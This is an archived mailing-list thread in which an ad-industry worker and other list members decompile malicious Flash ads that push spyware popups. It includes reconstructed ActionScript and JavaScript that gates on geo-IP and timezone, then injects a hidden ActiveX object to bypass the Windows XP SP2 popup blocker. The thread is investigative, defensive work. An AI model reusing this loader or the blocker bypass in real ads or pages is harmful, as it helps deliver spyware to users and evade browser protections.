[Flashcoders] Decompiling some sketchy flash code
Dear List,

First off, apologies if this is the wrong forum for this question. Some background -- I'm in the online advertising industry and I've been trying to track down and squash a scam that has been hitting the industry. There is a party out there (errorsafe.com) that is embedding some very nasty code in their flash ads that, depending on several factors, will pop up a new window and try to install their spyware using ActiveX. Here are two sample swf files:

http://content.yieldmanager.com/13312/94749/27e558c94df509ebe888fdc0060640e8.swf
http://content.yieldmanager.com/17344/138497/6d4ef47cf4071557d6749ad9c2fcf8cc.swf

Now I've been decompiling and extracting code with various tools to try to gain some insight. So, interestingly enough, one of them is a little older, and it's easier to point blame, as in the 'constants' the following is defined:

constants [...some taken out...]
  'http://www.errorsafe.com/pages/scanner/index.php?aid=tigerlid=swf7ax=1ex=1ed=2',
  'http://uk.matchservice.com/reg_swf.php?campaign=tiger',
  'easyPP',
  'http://uk.matchservice.com/?aid=tigerlid=swf7ax=0',
  'tz_begin', 'tz_end',
  'javascript:var w=window,n=navigator,a=n.appMinorVersion,d=document,u=\'',
  '\',dt=new Date(),tz=-dt.getTimezoneOffset()/60;p=(n.userAgent.indexOf(\'SV1\')!=-1)||(a(a.indexOf(\'SP2\')!=-1));i=(d.allencodeURI()!w.Event);if(!(tz=',
  'tz=',
  ')){if(p!d.getElementById(\'o\')){d.body.innerHTML+=\'object id=o height=0 classid=CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6/object\';};(ip)?o.launchURL(u):w.open(u);};void 0;',
  'jscript',
  '\';p=(n.userAgent.indexOf(\'SV1\')!=-1)||(a(a.indexOf(\'SP2\')!=-1));i=(d.allencodeURI()!w.Event);if(p!d.getElementById(\'o\')){d.body.innerHTML+=\'object id=o height=0 classid=CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6/object\';};(ip)?o.launchURL(u):w.open(u);void 0;',
  'unique:Date', 'Date', 'my_date:Date', 'my_so:SharedObject', '/',
  'tiger_swf7300506', 'SharedObject', 'getLocal', 'tm', 'setswfashCookie',
  'ClickTAG', 'ClickTARGET', '_blank', 'URL_btn',
  'onRelease'

The other file seems to have encrypted this information to make it hard to track down:

  'setcookie...', '_level0', 'l2', 'c1', 'l24', 'l1', 'l21', 'l22', 'l23', 'l25', 'this', 'l27', 't', 'l26', 'u',
  'l31', 'l32', 'l28', '_global', 'i', '_ll2', 'l33', 'l35', ' - ', 'l43', 'l34', 's', '_self', 'l37', 'l36',
  '??', '', '', '???', '???', '???', '?', '', '???', '?', 'l29', '???', 'l30', '?', '???', '?', '???', '?', '?', '??',
  '?ý?ý?ÿÖ?ý?¼?Ù??È?Ù?ý???ý???ÈýÙ?Êý??éò??È?Ù??ÿ?È?Ù¾ÖËË???Ê??ý??Êÿ??Ë?ý???Ë?ÿýË?Ê???Ûý??ÙÎÌÌÏÂ???ÙÂý?ÙÍÂ??ÙÍÂ??ÙξÈ??Ù???¼àý??ÄÅÈ??ÙÉ??Ê???ð???ë?ÄÅËÒÌ×??ĽÄ??ÚÙÉÕÂÂ??ØÙÉÏÅÅ???Ľ?Ê???á??Þ?å?ľ?¾ÅÅ??Êþ???Ê?äðéèÇÙÃØ?þ??ÿ?¼??Ù?¼??Ùø¾Ìø¾¼ÿ?ýÙø¾ßèïåàÖÒÞâÑÎÝÑÎÉÏÕÐÝÉÍÍàÏÉÞÍÑÏÉÌÌßÌÐâÓÕâÝÝÒø¾ÚØË?þ??ÿ?ÚÃ?×?Ê?ý??ÿ?ñîèÄ?Å?ÿý?ÿ?Ä?Å??ÊÄ?Å×ÄÌÅ×??×',
  'l38', '', 'l39', '', 'l40', '?', 'l41', '???', 'l42', '??', '?',
  'String', 'prototype', '', 'split', 'length', 'charCodeAt', 'fromCharCode', 'join',
  'newMenu', 'ContextMenu', 'hideBuiltInItems', 'menu', 'Date', 'epru2003intl592006', 'b', ' : ', '_ll1',
  'ClickTAG', 'http://workhomecenter.com/?aid=istemlid=intl', 'ClickTARGET', '_blank'

So I'm kind of at a loss as to how to figure out what this flash file does. They've clearly masked their code quite well to make it very difficult to see. I do know a few things:

- The file loads an outside html file, which checks the user's IP address, and depending on the geo that IP matches to, returns a 1/0 value (or in some cases, an encrypted 'yes/no') as to whether or not to serve a pop
- The flash file also checks the timezone of the browser in addition to IP as an added check that the user is outside the US.

Any insight? Again, apologies if this is the wrong list to ask and I will greatly appreciate direction if it isn't!
-Mike

___
Flashcoders@chattyfig.figleaf.com
To change your subscription options or search the archive:
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders
Brought to you by Fig Leaf Software
Premier Authorized Adobe Consulting and Training
http://www.figleaf.com
http://training.figleaf.com
RE: [Flashcoders] Decompiling some sketchy flash code
All I see on decompiling is things like:

    var eval (\x01) = 930;
    while (while (while (while (while (while (while (while (while (while (while (while (while (while (while (while (while (while (eval (\x01) == 930) {
        eval (\x01) = eval (\x01) - 695
    } , eval (\x01) == 67) {
        eval (\x01) = eval (\x01) + 718 // branch @1
    } , eval (\x01) == 349) {
        eval (\x01) = eval (\x01) + 149 // branch @1
    } , eval (\x01) == 264) {
        eval (\x01) = eval (\x01) + 84
    }

Am I missing something?

-Mike

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Michael Stuhr
Sent: Wednesday, September 20, 2006 5:05 PM
To: Flashcoders mailing list
Subject: Re: [Flashcoders] Decompiling some sketchy flash code

Michiel Nolet schrieb:
[original message quoted]

I tried to decompile them with asv (latest version). I can clearly see what is inside there. I would give you the rebuilt files, but maybe you should ask Burak himself (he is on this list) to give you those.
micha
RE: [Flashcoders] Decompiling some sketchy flash code
I am more than willing to shell out $59.95 for asv, I just want to make sure it can extract stuff that other tools couldn't. I've tried the free command line ones, and shelled out $30 for some crappy software that plain didn't work. Could you copy and paste some sample lines of more informative code you're finding?

-Mike

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Michael Stuhr
Sent: Wednesday, September 20, 2006 6:11 PM
To: Flashcoders mailing list
Subject: Re: [Flashcoders] Decompiling some sketchy flash code

Michiel Nolet schrieb:
[previous message quoted]

Sure, buy a copy of asv and you get the full experience :-)

micha
RE: [Flashcoders] Decompiling some sketchy flash code
Not at all, that is awesome, you don't understand how many hours I've been trying to find that info. I also have plenty more flash files to get the code from :). It's actually kind of interesting that they use javascript that checks useragent, timezone, etc. on whether a pop should be launched or not.

Burak, can I contact you at manitu at buraks.com ?

-Mike

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Michael Stuhr
Sent: Wednesday, September 20, 2006 6:52 PM
To: Flashcoders mailing list
Subject: Re: [Flashcoders] Decompiling some sketchy flash code

Michiel Nolet schrieb:
[previous message quoted]

    // Frame 1 actions as decompiled. The list archive mangled this listing:
    // "fl" was replaced by "swf" (setswfashCookie, swfush), and the "&&", ">=", "<=", ">"
    // operators and the <object> tags inside the javascript: strings were stripped.
    // Those tokens are reconstructed below; the URLs the poster replaced with ### stay elided.
    function setFlashCookie() {
        // getTime() is in milliseconds, so this "expiry" is 43.2 seconds, not 12 hours
        my_date.setTime(my_date.getTime() + 43200);
        my_so.data.expires = my_date.getTime();
        my_so.flush();
        if (_root.strong) {
            this.createEmptyMovieClip("target_mc", this.getNextHighestDepth());
            target_mc.unique = unique.getTime();
            // ask the server-side (geo-IP) script whether to pop; it answers popup=1 or popup=0
            target_mc.loadVariables(_root.sscript, "GET");
            target_mc.param_interval = setInterval(checkParamsLoaded, 100);
        }
    }
    function checkParamsLoaded() {
        if (target_mc.popup == undefined) {
            // still waiting for the loadVariables response
        } else if (target_mc.popup == 1) {
            clearInterval(target_mc.param_interval);
            // run the javascript: URL in the hosting page; the timezone check happens there
            getURL(_root.tzjscript, "_self");
        } else if (target_mc.popup == 0) {
            clearInterval(target_mc.param_interval);
        }
    }
    _root.strong = true;
    _root.strongPP = "###";   // real URL in the sample, elided by the poster
    _root.sscript = "###";
    _root.easyPP = "###";
    _root.tz_begin = -3;
    _root.tz_end = -9;
    // p: Windows XP SP2 browser (has the popup blocker); i: IE (document.all, no window.Event).
    // Pop only when the browser's UTC offset in hours is outside -9..-3, i.e. outside the US.
    // On IE/SP2 an invisible Windows Media Player ActiveX object (that CLSID) is injected and
    // its launchURL() opens the window, bypassing the popup blocker; otherwise window.open().
    _root.tzjscript = "javascript:var w=window,n=navigator,a=n.appMinorVersion,d=document,u='" + _root.strongPP
        + "',dt=new Date(),tz=-dt.getTimezoneOffset()/60;"
        + "p=(n.userAgent.indexOf('SV1')!=-1)||(a&&(a.indexOf('SP2')!=-1));"
        + "i=(d.all&&encodeURI()&&!w.Event);"
        + "if(!(tz>=" + _root.tz_end + "&&tz<=" + _root.tz_begin + ")){"
        + "if(p&&!d.getElementById('o')){d.body.innerHTML+='<object id=o height=\"0\" classid=\"CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6\"></object>';};"
        + "(i&&p)?o.launchURL(u):w.open(u);};void 0;";
    // same launcher without the timezone gate
    _root.jscript = "javascript:var w=window,n=navigator,a=n.appMinorVersion,d=document,u='" + _root.strongPP
        + "';p=(n.userAgent.indexOf('SV1')!=-1)||(a&&(a.indexOf('SP2')!=-1));"
        + "i=(d.all&&encodeURI()&&!w.Event);"
        + "if(p&&!d.getElementById('o')){d.body.innerHTML+='<object id=o height=\"0\" classid=\"CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6\"></object>';};"
        + "(i&&p)?o.launchURL(u):w.open(u);void 0;";
    var unique:Date = new Date();
    var my_date:Date = new Date();
    // local shared object ("flash cookie") used to rate-limit the pop per machine
    var my_so:SharedObject = SharedObject.getLocal("tiger_swf7300506", "/");
    if (my_so.data.expires != undefined) {
        var tm = my_date.getTime();
        if (tm > my_so.data.expires) {
            setFlashCookie();
        }
    } else {
        setFlashCookie();
    }
    if (_root.ClickTAG == undefined) {
        _root.ClickTAG = _root.easyPP;
    }
    if (_root.ClickTARGET == undefined) {
        _root.ClickTARGET = "_blank";
    }
    _root.URL_btn.onRelease = function () {
        getURL(_root.ClickTAG, _root.ClickTARGET);
    };

Those ###'s are real URLs. And those are only the actions on frame 1 ... I guess you lost ~60 bucks right now :-)

micha